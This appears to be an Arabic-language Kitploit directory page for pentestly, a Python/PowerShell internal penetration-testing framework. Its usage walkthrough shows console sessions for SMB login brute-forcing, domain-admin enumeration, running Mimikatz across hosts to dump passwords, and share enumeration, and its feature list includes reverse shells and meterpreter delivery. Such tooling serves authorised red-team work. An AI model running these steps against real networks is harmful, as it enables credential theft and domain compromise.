Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pentestly — إطار اختبار اختراق داخلي بلغة بايثون وباورشيل | Kitploit
أدوات/GitHubGitHub/praetorian-inc/pentestly
أطر اختبار الاختراقتصعيد الامتيازاتالاستطلاعهجمات كلمات المرورالاستغلالالحركة الجانبيةجمع المعلوماتما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرArchived
72113721منذ 10 سنواتتمت المراجعة من قبل Kitploit
GitHubpraetorian-inc/pentestly

pentestly

إطار اختبار اختراق داخلي بلغة بايثون وباورشيل

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بنتيستلي

بنتيستلي هو مزيج من أدوات بايثون المتوسعة لاستخدامها في اختبارات الاختراق. الهدف هو استخدام واجهة مستخدم مألوفة مع تسهيل المساهمات في الإطار باستخدام قوة بايثون.

منشور المدونة: إطار بنتيستلي: عندما يلتقي اختبار الاختراق مع بايثون وباورشيل

المؤلف: @ctfhacker / كوري دوبلانتيس

عرض توضيحي

asciicast

الميزات الحالية

  • استيراد XML من NMAP
  • اختبار مصادقة SMB باستخدام:
    • بيانات اعتماد فردية
    • ملف يحتوي على بيانات اعتماد
    • بيانات اعتماد فارغة
    • تجزئة NTLM
  • اختبار صلاحيات المسؤول المحلي لمصادقة SMB ناجحة
  • تحديد مشاركات SMB القابلة للقراءة لبيانات الاعتماد الصالحة
  • تخزين أسماء حسابات مسؤولي المجال/المؤسسة
  • تحديد موقع عمليات مسؤول المجال قيد التشغيل
  • تحديد أنظمة مسؤولي المجال المسجلين دخولاً
  • تنفيذ أوامر باورشيل في الذاكرة واستخراج النتائج
  • تنفيذ Mimikatz لجمع كلمة المرور النصية من الذاكرة (Invoke-Mimikatz.ps1)
  • استقبال واجهة أوامر (Powercat)
  • استقبال جلسة meterpreter (Invoke-Shellcode.ps1)

على أكتاف العمالقة

يقف بنتيستلي على أكتاف العمالقة. فيما يلي الأدوات الحالية المستخدمة في بنتيستلي:

  • recon-ng - قاعدة البيانات الخلفية لـ recon-ng مصممة بشكل جميل ويتم الاستفادة منها في بنتيستلي لمعالجة البيانات

  • wmiexec.py - يتيح تنفيذ أوامر باورشيل بسرعة وسهولة عبر WMI

  • smbmap.py - أداة مفيدة لتعداد مشاركات SMB

  • Invoke-Mimikatz.ps1 - تطبيق Mimikatz في باورشيل

  • powercat.ps1 - وظائف شبيهة بـ Netcat في باورشيل

  • Invoke-Shellcode.ps1 - نشر Meterpreter في باورشيل

  • CrackMapExec - مصدر إلهام لخادم Mimikatz البسيط في بنتيستلي

التثبيت

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

الاستخدام

دعنا نستعرض عدة وظائف مطبقة حالياً.

تغيير مساحة العمل

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

التحميل من nmap

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       مسار واسم ملف لإدخال nmap XML

[pentestly][project][nmap_xml] > run

اختبار تسجيلات الدخول

استخدام ملف يحتوي على بيانات الاعتماد لاختبار تسجيل الدخول

[pentestly][project][login] > cat /tmp/creds
[*] الأمر: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

استخدام اسم مستخدم وكلمة مرور فرديين

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

استخدام بيانات الاعتماد على مجموعة فرعية صغيرة من عناوين IP أي على شبكة 192.168.8.0/24 الموجودة في الجدول

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

جمع أسماء مسؤولي المجال والمؤسسة

[pentestly][project][login] > load get_domain # لاحظ البحث الضبابي - get_domain يجد get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       مصدر الإدخال (انظر 'show info' للتفاصيل)

[pentestly][project][get_domain_admin_names] > run
[*] تم العثور على مسؤول مجال: domain\admin1
[*] تم العثور على مسؤول مجال: domain\admin2

تشغيل mimikatz عبر عناوين IP التي تتمتع بصلاحيات التنفيذ

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
اختر واجهة محلية لاستضافة البرامج النصية

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] بيانات اعتماد التنفيذ: domain\Admin:[email protected]
[*] نجاح! Admin.DA:p@$$w0rd  - مسؤول المجال!

عرض المسؤولين المحليين

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

عرض مسؤولي المجال

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

تعداد المشاركات

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] بيانات اعتماد التنفيذ: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

عرض المشاركات الجديدة

[pentestly][default][interesting_files] > show pentestly_shares

+------------------------------------------------------------------------------------------------+
| rowid |       host      |    username   | readwrite |      readonly     | noaccess |   module   |
+-------------------------------------------------------------------------------------------------+
| 1     | 192.168.224.252 | Administrator |           | ADMIN$,C,C$,Users | IPC$     | enumshares |
+-------------------------------------------------------------------------------------------------+

البحث/تنزيل الملفات المهمة

[pentestly][default][interesting_files] > show options
تنزيل الأداة